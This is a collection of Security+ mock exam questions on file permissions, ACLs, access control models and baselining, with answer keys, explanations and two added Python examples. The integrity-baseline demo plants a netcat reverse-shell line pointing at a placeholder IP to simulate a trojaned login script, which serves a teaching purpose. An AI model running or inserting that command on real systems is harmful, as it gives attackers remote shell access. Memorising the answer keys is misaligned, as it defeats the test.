CompTIA Security Plus Mock Test Q1585

During a Linux security audit at a local college, it was noted that members of the dean’s group were able to modify employee records in addition to modifying student records, resulting in an audit exception. The college security policy states that the dean’s group should only have the ability to modify student records. Assuming that the correct user and group ownerships are in place, which of the following sets of permissions should have been assigned to the directories containing the employee records?

A. r-x---rwx
B. rwxrwxrwx
C. rwx----wx
D. rwxrwxr--

Correct Answer: D
Section: Mixed Questions

Explanation:
With the correct user and group ownership in place, the dean's group is neither the owner nor the owning group of the employee-records directories, so the "other" bits are what apply to it. D (rwxrwxr--) is the only option that gives "other" no write bit, and without write on a directory a user cannot create, delete or rename entries in it (without execute they cannot even traverse into it). A, B and C all grant write to "other", so each would let the dean's group modify employee records.

CompTIA Security Plus Mock Test Q1415

A recent audit has revealed that several users have retained permissions to systems they should no longer have rights to after being promoted or changed job positions. Which of the following controls would BEST mitigate this issue?

A. Separation of duties
B. User account reviews
C. Group based privileges
D. Acceptable use policies

Correct Answer: B
Section: Mixed Questions

Explanation:
Rights that accumulate as people are promoted or moved between roles (privilege creep) are caught by periodic user account reviews, which compare each account's permissions against the user's current job and remove what is no longer needed. Separation of duties (A) limits what one person may do within a process but does not revoke stale rights; group-based privileges (C) make revocation easier but still depend on someone moving the user between groups; an acceptable use policy (D) is administrative guidance and changes no permissions.

CompTIA Security Plus Mock Test Q1409

Ann, a security administrator at a call center, has been experiencing problems with users intentionally installing unapproved and occasionally malicious software on their computers. Due to the nature of their jobs, Ann cannot change their permissions. Which of the following would BEST alleviate her concerns?

A. Deploy a HIDS suite on the users’ computer to prevent application installation
B. Maintain the baseline posture at the highest OS patch level
C. Enable the pop-up blockers on the user’s browsers to prevent malware
D. Create an approved application list and block anything not on it

Correct Answer: D
Section: Mixed Questions

CompTIA Security Plus Mock Test Q1356

After installing a new Linux system the administrator runs a command that records the size, permissions, and MD5 sum of all the files on the system. Which of the following describes what the administrator is doing?

A. Identifying vulnerabilities
B. Design review
C. Host software baselining
D. Operating system hardening


Correct Answer: C
Section: Mixed Questions

CompTIA Security Plus Mock Test Q1226

The access control list (ACL) for a file on a server is as follows:
User: rwx
User: Ann: r--
User: Joe: r--
Group: rwx
Group: sales: r-x
Other: r-x
Joe and Ann are members of the Human Resources group. Will Ann and Joe be able to run the file?

A. No since Ann and Joe are members of the Sales group owner of the file
B. Yes since the regular permissions override the ACL for the file
C. No since the ACL overrides the regular permissions for the file
D. Yes since the regular permissions and the ACL combine to create the effective permissions on the file

Correct Answer: C
Section: Mixed Questions

Explanation:
POSIX ACL entries are matched in a fixed order: owner, then named users, then the owning group and named groups, then other. The first class that matches decides. Ann and Joe each have a named-user entry of r--, so that entry applies to them before any group or other entry is considered, however generous those entries are. Neither named-user entry carries the execute bit, so neither Ann nor Joe can run the file.
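A small evaluator for the POSIX ACL matching order, serving both the directory-mode question (Q1585) and the ACL question (Q1226) above. It is an added example and not part of the test material; the ACL it checks is the one quoted in Q1226, while the owner and group names hr_admin, hr, bob, carol, students and deans are assumptions, since neither question states them.

```python
"""Effective-permission check for a POSIX ACL, in the order the kernel applies
entries (owner, named users, groups, other).

Added worked example for Q1585 and Q1226; not part of the original test
material. The owner and group names (hr_admin, hr, bob, carol, students,
deans) are assumptions chosen to illustrate the evaluation.
"""
from typing import Iterable, List, Optional, Tuple

# One ACL entry in getfacl(1) form: (tag, qualifier, perms).
# tag is "user", "group", "mask" or "other"; the qualifier is "" for the
# owner entry (user::) and the owning-group entry (group::).
Entry = Tuple[str, str, str]


def _grants(perms: str, requested: str) -> bool:
    """True when every requested bit ('r', 'w', 'x') is present in perms."""
    return all(bit in perms for bit in requested)


def _masked(perms: str, mask: Optional[str]) -> str:
    """Named-user, named-group and owning-group entries are capped by mask::."""
    if mask is None:
        return perms
    return "".join(bit for bit in perms if bit != "-" and bit in mask)


def check_access(acl: List[Entry], owner: str, owning_group: str,
                 uid: str, groups: Iterable[str], requested: str) -> bool:
    """Decide whether `uid` (member of `groups`) gets the `requested` bits.

    Matching order from acl(5): the first class that matches decides, so a
    named-user entry applies even when the group or other entries are wider.
    """
    groups = set(groups)
    mask = next((p for t, q, p in acl if t == "mask"), None)

    # 1. Owner: the user:: entry alone, not subject to the mask.
    if uid == owner:
        owner_perms = next(p for t, q, p in acl if t == "user" and q == "")
        return _grants(owner_perms, requested)

    # 2. Named user: this entry decides, whatever the group entries say.
    for t, q, p in acl:
        if t == "user" and q == uid:
            return _grants(_masked(p, mask), requested)

    # 3. Owning group and named groups the caller belongs to: granted only if
    #    one matching entry contains the whole request, denied otherwise.
    matched = False
    for t, q, p in acl:
        if t != "group":
            continue
        if (q == "" and owning_group in groups) or (q != "" and q in groups):
            matched = True
            if _grants(_masked(p, mask), requested):
                return True
    if matched:
        return False

    # 4. Everyone else: the other:: entry.
    return _grants(next(p for t, q, p in acl if t == "other"), requested)


def mode_to_acl(mode: str) -> List[Entry]:
    """Expand a 9-character ls-style mode such as 'rwxrwxr--' into base entries."""
    if len(mode) != 9:
        raise ValueError("mode must be 9 characters, e.g. rwxr-xr--")
    return [("user", "", mode[0:3]), ("group", "", mode[3:6]), ("other", "", mode[6:9])]


def outsider_can_write(mode: str) -> bool:
    """Can someone who is neither the owner nor in the owning group write?

    On a directory the 'w' bit is what permits creating, renaming and deleting
    entries, so this is the check behind Q1585: once the employee-records
    directories are owned by the right user:group, the dean's group is an outsider.
    """
    return check_access(mode_to_acl(mode), "hr_admin", "hr", "dean1", {"deans"}, "w")


# The ACL quoted in Q1226, in getfacl order.
Q1226_ACL: List[Entry] = [
    ("user", "", "rwx"),        # user::rwx     (owner)
    ("user", "ann", "r--"),     # user:ann:r--
    ("user", "joe", "r--"),     # user:joe:r--
    ("group", "", "rwx"),       # group::rwx    (owning group)
    ("group", "sales", "r-x"),  # group:sales:r-x
    ("other", "", "r-x"),       # other::r-x
]

if __name__ == "__main__":
    # Assumed: the file is owned by hr_admin:hr, and Ann and Joe are in hr.
    for who, grps in (("ann", {"hr"}), ("joe", {"hr"}), ("bob", {"sales"}), ("carol", {"students"})):
        print(f"{who:6} execute: {check_access(Q1226_ACL, 'hr_admin', 'hr', who, grps, 'x')}")
    for mode in ("r-x---rwx", "rwxrwxrwx", "rwx----wx", "rwxrwxr--"):
        print(f"{mode}  outsider can write: {outsider_can_write(mode)}")
```

Running it shows that ann and joe cannot execute the file (their named-user entries are checked before the group entries), that a member of sales can, and that rwxrwxr-- is the only one of the four modes from Q1585 that leaves an outsider without write. A mask:: entry is honoured when present: appending ("mask", "", "r--") to the list caps the sales entry at r-- and execute is refused.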

CompTIA Security Plus Mock Test Q1162

The security administrator runs an rpm verify command which records the MD5 sum, permissions, and timestamp of each file on the system. The administrator saves this information to a separate server. Which of the following describes the procedure the administrator has performed?

A. Host software base-lining
B. File snapshot collection
C. TPM
D. ROMDB verification

Correct Answer: A
Section: Mixed Questions

Explanation:
rpm -V (verify) compares each installed file's size, mode, digest, timestamp and ownership with what the RPM database recorded at install time. Capturing that output for a freshly installed system and storing it on a separate server creates a known-good record of the host's software, which later snapshots can be compared against to detect tampering: host software baselining. "ROMDB verification" is not a recognised term, a TPM (C) is a hardware chip rather than something an rpm command performs, and a snapshot (B) describes the copy rather than the purpose it serves.
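A file-integrity baseline in code, serving both Q1356 and Q1162 above: record size, permission bits, mtime and a digest for every regular file under a root, keep that record away from the audited tree, and diff a later snapshot against it. This is an added example and not the rpm command itself (rpm -V checks installed files against the package database that lives on the same host); the sample tree, file names and contents it builds in a temporary directory are constructed here for the demonstration.

```python
"""Host software baseline: size, mode, mtime and digest per regular file,
stored off the audited tree and diffed against a later snapshot.

Added worked example for Q1356 and Q1162; not part of the original test
material and not rpm -V. The sample tree below is constructed for the demo.
"""
import hashlib
import json
import os
import stat
import tempfile
from typing import Dict, List


def file_digest(path: str) -> str:
    """SHA-256 of the file. The question names MD5, but MD5 collisions are
    practical, so a replaced file could be made to keep the same MD5 sum."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> Dict[str, dict]:
    """Map relative path -> {size, mode, mtime, sha256} for regular files only."""
    baseline: Dict[str, dict] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets, devices: nothing to hash
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            baseline[rel] = {
                "size": st.st_size,
                "mode": oct(stat.S_IMODE(st.st_mode)),
                "mtime": int(st.st_mtime),
                "sha256": file_digest(path),
            }
    return baseline


def save_baseline(baseline: Dict[str, dict], path: str) -> None:
    """Write the record as JSON; in practice `path` is on a separate server."""
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path: str) -> Dict[str, dict]:
    with open(path) as f:
        return json.load(f)


def diff_baseline(old: Dict[str, dict], new: Dict[str, dict]) -> Dict[str, object]:
    """Report files added, removed, and changed (with the attributes that differ)."""
    changed: Dict[str, List[str]] = {}
    for rel in sorted(set(old) & set(new)):
        fields = [k for k in old[rel] if old[rel][k] != new[rel][k]]
        if fields:
            changed[rel] = fields
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": changed,
    }


def demo() -> Dict[str, object]:
    """Build a constructed tree, baseline it, tamper with it, return the diff."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        os.makedirs(os.path.join(root, "bin"))
        login = os.path.join(root, "bin", "login")
        conf = os.path.join(root, "sshd.conf")
        with open(login, "wb") as f:
            f.write(b"#!/bin/sh\nexec /sbin/real_login \"$@\"\n")  # constructed
        os.chmod(login, 0o755)
        with open(conf, "w") as f:
            f.write("PermitRootLogin no\n")  # constructed
        os.chmod(conf, 0o644)

        # Snapshot at install time, kept away from the audited tree.
        record = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), record)

        # Tampering: trojaned binary, world-writable config, dropped extra file.
        with open(login, "ab") as f:
            f.write(b"nc -e /bin/sh 192.0.2.10 4444 &\n")
        os.chmod(conf, 0o666)
        with open(os.path.join(root, "bin", ".cache"), "w") as f:
            f.write("payload\n")

        return diff_baseline(load_baseline(record), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The diff reports bin/.cache as added, bin/login as changed in size and digest, and sshd.conf as changed in mode only, which is the kind of finding rpm -V expresses with its S, 5 and M flags. Storing the record off-host matters because an attacker with root on the audited machine can rewrite a local baseline (or the RPM database) to match the tampered files.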

CompTIA Security Plus Mock Test Q988

Ann is a member of the Sales group. She needs to collaborate with Joe, a member of the IT group, to edit a file. Currently, the file has the following permissions:
Ann: read/write
Sales Group: read
IT Group: no access
If a discretionary access control list is in place for the files owned by Ann, which of the following would be the BEST way to share the file with Joe?

A. Add Joe to the Sales group.
B. Have the system administrator give Joe full access to the file.
C. Give Joe the appropriate access to the file directly.
D. Remove Joe from the IT group and add him to the Sales group.


Correct Answer: C
Section: Access Control and Identity Management

Explanation:
Joe needs access to only one file. He also needs to ‘edit’ that file. Editing a file requires Read and Write access to the file. The best way to provide Joe with the minimum required
permissions to edit the file would be to give Joe the appropriate access to the file directly.

Incorrect Answers:
A: The Sales group only has read access to the file. Joe needs Read and Write access to the file. Adding Joe to the Sales group will not provide him with the required access to the
file. Therefore, this answer is incorrect.
B: Joe needs Read and Write access to the file; he does not need full access to the file. It is best practice from a security perspective to provide the minimum permissions required.
Therefore, this answer is incorrect.
D: Something to watch out for with these questions: "No access" means the group has neither been granted nor denied access to the file. "Access Denied" is different; it means access has been explicitly denied, and an explicit deny overrides any access granted through other entries. Removing Joe from the IT group would take away the access he needs for his normal IT duties, and adding him to the Sales group would still give him only the read access that group has. Joe needs Read and Write access to the file. Therefore, this answer is incorrect.

CompTIA Security Plus Mock Test Q979

A company has 5 users. Users 1, 2 and 3 need access to payroll and users 3, 4 and 5 need access to sales. Which of the following should be implemented to give the appropriate access while enforcing least privilege?

A. Assign individual permissions to users 1 and 2 for payroll. Assign individual permissions to users 4 and 5 for sales. Make user 3 an administrator.
B. Make all users administrators and then restrict users 1 and 2 from sales. Then restrict users 4 and 5 from payroll.
C. Create two additional generic accounts, one for payroll and one for sales that users utilize.
D. Create a sales group with users 3, 4 and 5. Create a payroll group with users 1, 2 and 3.


Correct Answer: D
Section: Access Control and Identity Management

Explanation:
Assigning permissions to a group requires less effort than assigning permissions to individual users. When you have groups configured with the appropriate permissions, you can grant
the permissions to individual users by adding the users to the groups. Users can be members of multiple groups and therefore have multiple sets of permissions assigned to them. In
this answer, user 3 is a member of both groups which grants the user permission to both Sales and Payroll.

Incorrect Answers:
A: Assigning individual permissions to individual users requires a lot more administrative effort than assigning permissions to groups and adding the users to the groups, and making user 3 an administrator grants far more than access to payroll and sales, which violates least privilege. Therefore, this
answer is incorrect.
B: The question states that you must enforce least privilege. Granting the users administrator access gives them full access to everything. They could even remove the restrictions that
this answer suggests using. Therefore, this answer is incorrect.
C: Employees should not share user accounts. You should grant the appropriate permissions to the users’ user accounts (by way of group membership); not create additional accounts
for multiple users to use. Therefore, this answer is incorrect.

CompTIA Security Plus Mock Test Q972

A supervisor in the human resources department has been given additional job duties in the accounting department. Part of their new duties will be to check the daily balance sheet calculations on spreadsheets that are restricted to the accounting group. In which of the following ways should the account be handled?

A. The supervisor should be allowed to have access to the spreadsheet files, and their membership in the human resources group should be terminated.
B. The supervisor should be removed from the human resources group and added to the accounting group.
C. The supervisor should be added to the accounting group while maintaining their membership in the human resources group.
D. The supervisor should only maintain membership in the human resources group.

Correct Answer: C
Section: Access Control and Identity Management

Explanation:
You can assign permissions to access resources either to a user or to a group. The most efficient way is to assign permissions to a group (group based privileges). Adding the
human resources supervisor's user account to the accounting group means the supervisor inherits the permissions of that group and can carry out the new duties. Because the new
duties are being added to his normal duties, maintaining membership in the human resources group will allow the supervisor to continue performing his normal duties.

Incorrect Answers:
A: Because the new duties are being added to his normal duties, terminating the supervisor’s membership in the human resources group will prevent the supervisor from carrying out
his normal duties as he will no longer have the required permissions.
B: Because the new duties are being added to his normal duties, removing the supervisor from the human resources group will prevent the supervisor from carrying out his normal
duties as he will no longer have the required permissions.
D: Maintaining the supervisor’s membership in the human resources group only, will prevent the supervisor from carrying out his additional duties in the accounting department as the
supervisor will not have the required permissions.

References:
Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, p. 294

CompTIA Security Plus Mock Test Q899

The IT department has set up a SharePoint site to be used on the intranet. Security has established the groups and permissions on the site. No one may modify the permissions and all requests for access are centrally managed by the security team. This is an example of which of the following control types?

A. Rule based access control
B. Mandatory access control
C. User assigned privilege
D. Discretionary access control

Correct Answer: B
Section: Access Control and Identity Management

Explanation:
Under mandatory access control (MAC) the access rules are set centrally by the security administrator and enforced by the system; the owner of an object cannot change who may access it, and every access request is decided by the central policy. That is the arrangement described here: the security team sets the groups and permissions, nobody else may alter them, and all requests for access go through the security team.

Incorrect Answers:
A: Rule-based access control grants or denies access according to a list of rules, such as the filtering rules on a firewall or router, rather than a centrally administered policy over objects and subjects.
C: User assigned privilege is when permissions are allowed or refused for a specific individual user.
D: Discretionary access control (DAC) allows access to be granted or restricted by an object's owner, at the owner's discretion. Here the owners may not modify the permissions at all.

References:
Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 278-284, 294